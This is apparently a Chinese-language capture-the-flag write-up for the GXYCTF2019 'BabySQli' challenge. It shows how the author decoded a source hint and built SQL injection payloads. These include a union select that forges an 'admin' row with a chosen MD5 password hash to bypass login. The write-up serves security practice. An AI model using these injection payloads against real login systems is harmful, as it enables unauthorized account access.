[GXYCTF2019]BabySQli

avatar
作者
猴君
阅读量:2

原题目描述:刚学完sqli,我才知道万能口令这么危险,还好我进行了防护,还用md5哈希了密码!

我看到是个黑盒先想着搞一份源码
在这里插入图片描述
我dirsearch明明扫到了.git,算了直接注入试试看
随便输入了两个东西,发现源码有提示
在这里插入图片描述
全是大写字母,base32解码一下,然后再base64解码
在这里插入图片描述
在这里插入图片描述

select * from user where username = '$name' 找到注入点name 

我第一个写的是这样的

1'union(select)1,2,3' 

结果不行,后面把()删除了就可以了

1'union select 1,(select group_concat(schema_name) from infoorrmation_schema.schemata),3' 

写联合注入,不行,没有绕过白名单
在这里插入图片描述
换个思路,不爆数据了,我们不是要登录嘛,题目提示密码被md5了
本地尝试一下
在这里插入图片描述
成功了,md5我们直接用数组绕过即可
在这里插入图片描述
不准用?
后面想了一下数组绕过的原理是md5无法正确处理那写个NULL

name=1'union select 1,'admin',NULL'&pw[]=123 

或者那就在线加密一下

name=1'union select 1,'admin','c4ca4238a0b923820dcc509a6f75849b''&pw=1 我这么写回显说是错的但是我想着应该不会错,代入原句 select * from user where username = '1'union select 1,'admin','c4ca4238a0b923820dcc509a6f75849b''' 

多了一个空所以应该不能正常解析,我们换成闭合

name=1'union select 1,'admin','c4ca4238a0b923820dcc509a6f75849b'--+&pw=1 

广告一刻

为您即时展示最新活动产品广告消息,让您随时掌握产品活动新动态!